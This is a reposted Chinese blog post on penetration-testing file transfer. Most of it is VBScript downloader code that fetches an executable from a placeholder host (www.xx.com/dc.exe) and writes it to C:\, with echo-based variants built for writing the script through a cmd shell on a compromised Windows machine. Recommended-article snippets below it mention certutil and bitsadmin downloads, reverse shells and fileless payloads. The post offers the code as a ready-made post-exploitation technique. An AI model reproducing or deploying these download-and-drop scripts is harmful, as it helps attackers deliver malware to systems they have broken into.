渗透测试中的文件传输通道1- cmd下下载文件

最新推荐文章于 2022-07-11 10:24:48 发布
最新推荐文章于 2022-07-11 10:24:48 发布
阅读量968 收藏 1
点赞数
文章标签: 面试
原文链接:http://www.cnblogs.com/dongchi/p/4946992.html
版权

Set xPost = createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xx.com/dc.exe",0 '下载文件的地址
xPost.Send()
Set sGet = createObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\dc.exe",2 '保存文件的路径和文件名

把以上代码保存在xx.vbs文件 执行cmd.exe xx.vbs

使用ECHO方法写入
echo Set xPost = createObject("Microsoft.XMLHTTP") >dc.vbs
echo xPost.Open "GET",http://www.xxx.com/dc.exe,0 >>dc.vbs
echo xPost.Send() >>dc.vbs
echo Set sGet = createObject("ADODB.Stream") >>dc.vbs
echo sGet.Mode = 3 >>dc.vbs
echo sGet.Type = 1 >>dc.vbs
echo sGet.Open() >>dc.vbs
echo sGet.Write(xPost.responseBody) >>dc.vbs
echo sGet.SaveToFile "c:\dc.exe",2 >>dc.vbs

===================带参数的WGET.vbs==========
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET",iRemote,0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
===================带参数的WGET.vbs==========

===================带参数的WGET.vbs==========
echo on
echo on error resume next >dc.vbs
echo iLocal=LCase(Wscript.Arguments(1))>>dc.vbs
echo iRemote=LCase(Wscript.Arguments(0))>>dc.vbs
echo Set xPost=createObject("Microsoft.XMLHTTP")>>dc.vbs
echo xPost.Open "GET",iRemote,0>>dc.vbs
echo xPost.Send()>>dc.vbs
echo set sGet=createObject("ADODB.Stream")>>dc.vbs
echo sGet.Mode=3>>dc.vbs
echo sGet.Type=1>>dc.vbs
echo sGet.Open()>>dc.vbs
echo sGet.Write xPost.ResponseBody>>dc.vbs
echo sGet.SaveToFile iLocal,2>>dc.vbs
echo off
pasue
===================带参数的WGET.vbs==========

1.iget.vbs一次写入
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写

Set x= createObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2

这样我们可以一次echo成功,echo版本:

echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs

转载于:https://www.cnblogs.com/dongchi/p/4946992.html

weixin_30316097
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试31---远程文件包含漏洞
初遇我ㄖ寸の热情呢?
04-14 7918
远程文件包含漏洞 原理:没有过滤 示意图 文件包含:语法是一样的,都是程序员在程序里面用了include(“文件名”) 第一关 文件包含的file不同,效果就不一样。取决于文件怎么写的 这里放的是一个http连接,其实比本地文件包含更可怕。哪怕本地机器上没有,直接指向肉鸡上的文件就可以 后缀是文本文件的格式(正确的) http://192.168.1.8/DVWA/vulnerab...
渗透自学(六)文件上传
qq_57449919的博客
01-10 1203
渗透基础自学知识,有写的不好的地方请多多指出
[渗透技巧] Windows命令行下载
abc5578786的博客
01-08 386
certutil简介 用于证书管理 支持环境: XP - Windows 10 全系统 更多:https://technet.microsoft.com/zh-cn/library/cc755341(v=ws.10).aspx downloader (1) 保存在当前路径,文件名称同URL eg: certutil.exe -urlcache -spl...
后渗透——内网转发之利用ftp实现文件传输
爱国小白帽
03-21 3548
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,...
cmd浏览所有文件命令_渗透技巧——从github下载文件的多种方法
weixin_39854778的博客
11-27 488
渗透技巧——从github下载文件的多种方法0x00 前言本文源于一个有趣的问题:已知exe文件:https://github.com/3gstudent/test/raw/master/putty.exeWindows环境,需要将该exe释放到指定目录并执行,例如c:\download问:通过cmd实现的最短代码是多少字符?0x01 简介本文将要介绍以下内容:•通过cmd实现从gith...
linux 离线安装perl-IPC-Cmd
12-25
但由于离线安装的需求,你需要在有网络的机器上下载对应的`.tar.gz`文件,例如`IPC-Cmd-0.94.tar.gz`,然后将文件传输到你的目标离线机器上。 在目标机器上,解压下载文件: ```bash tar -zxvf IPC-Cmd-0.94.tar...
BAT批处理脚本-文件相关操作-cmd里编辑文件.zip
最新发布
12-26
这个压缩包"BAT批处理脚本-文件相关操作-cmd里编辑文件.zip"包含了在命令提示符(CMD)环境下进行文件操作的示例脚本。在开始深入探讨之前,需要明确一点:为了安全起见,原始的批处理脚本文件可能以TXT格式提供,...
env-cmd:从文件设置环境变量
02-04
一个简单的节点程序,用于使用环境文件的环境执行命令。 :floppy_disk: 安装 npm install env-cmd或npm install -g env-cmd :keyboard_selector: 基本用法 环境文件./.env # This is a comment ENV1=THANKS ...
dsp--28335的cmd文件学习
08-05
CMD文件在嵌入式系统开发,特别是德州仪器(TI)的DSP处理器如TMS320C28335扮演着至关重要的角色。CMD文件全称为“Command Configuration File”,它定义了编译器如何组织和定位代码、数据以及初始化数据到目标...
TCP+cmd加密传输文件.rar
05-20
在这个"TCP+cmd加密传输文件.rar"压缩包,我们主要探讨的是如何利用C++编程语言,结合socket库,实现基于TCP的文件传输,并且加入了简单的命令行接口(cmd)以及加密功能,这对于C++初学者来说是一个很好的学习...
dns2tcp隐蔽通道工具windows版本
05-06
dns2tcp隐蔽通道工具windows版本,支持32位及64位,经过测试可以用。
笔记-常用软件安全下载地址
zlwtrouble的博客
05-24 282
微软公司的全家桶下载,百度搜索msdnwindows系统下载
linux全局运行脚本,Linux怎么运行脚本三分钟宣传
weixin_39883462的博客
04-30 115
但有一点要注意的是,在UnloadForm1之前一定要先UnloadForm2Set Wshell=WScript.CreateObject("WScript.Shell")If MsgBox("到我空间转转?顺便挖金示例 1:这就是说,如果使用看起来象是数字的数据,则VBScript会假定其为数字并以适用于数字的方式处理on error resume nextiLocal=LCase(Wscri...
cmd 环境下载文件的几种方法
weixin_41755681的博客
05-18 7403
cmd 环境下载文件的几种方法 在渗透通常会遇到只有cmd shell的情况,在这种情况下,通常需要下载文件来进行后续渗透。这里记录了几种在cmd下不需要其他三方程序就可以直接下载文件的方法。 1.certutilcertutil -urlcache -split -f https://www.xxx.com/test.pycertutil -urlcache -split -f https://www.xxx.com/test.py ff.py #指定保存文件名 2.bitsadminbitsad
后渗透系列之windows文件下载
kukudeshuo的博客
07-11 1435
在遇到目标服务器是windows服务器时,此篇文章能帮到你windows如何在命令行下面下载文件达到反弹shell的效果
渗透技巧——通过cmd上传文件的N种方法
citelao的博客
04-08 7842
渗透技巧——通过cmd上传文件的N种方法 三好学生 · 2016/04/05 10:23 0x00 前言 在渗透测试的过程,常常需要向目标主机上传文件,我在最近的学习测试过程就碰到了这个问题,要求只能通过cmd shell向目标主机(Windows系统)上传文件,所以本文就对该技巧做一下总结。 图片来自于http://www.telegraph.co.uk/news
CMD更强大的命令行:WMIC后渗透利用(系统命令)
热门推荐
discover2210212455的博客
09-15 5万+
写在前面的话 在这篇文章,我们将讨论如何在攻击的后渗透利用阶段使用WMIC(Windows Management InstrumentationCommand Line)。当攻击者在远程PC上拿到meterpreter会话之后,他们就可以枚举大量的系统信息,并利用WMI命令行工具来进行更深程度的操作。 首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大...
内网渗透之——数据压缩、传输
wsnbbz的博客
03-19 2202
数据压缩 作用: 将文件打包,方便下载 Linux 直接使用tar命令压缩 windows 利用Rar.exe(winrar.exe里的执行文件) 参数说明: a 添加文件到压缩文件 -k 锁定压缩文件 -s产生固体存档,这样可以增大压缩比 -r包括子目录 -m 设置压缩比 -m0 存储 添加到压缩文件时不压缩文件。 -m1 最快 使用最快方式(低...
渗透测试之无文件渗透简单使用-windows
Testfan_zhou的博客
06-17 670
文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存执行,也让专家很难在系统重启之后找到此恶意软件的踪迹。 在日常的渗透测试,如果使用无文件渗透,那么也同样可以保证在执行恶意测试程序...
perl-ipc-cmd-1.02-1.el8.noarch.rpm下载
07-20
6. 下载完成后,您可以使用`ls`命令查看当前目录是否存在Perl-IPC-Cmd-1.02-1.el8.noarch.rpm文件。 请注意,URL给出的示例仅为示范用途,您需要将其替换为提供Perl-IPC-Cmd-1.02-1.el8.noarch.rpm的实际来源的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值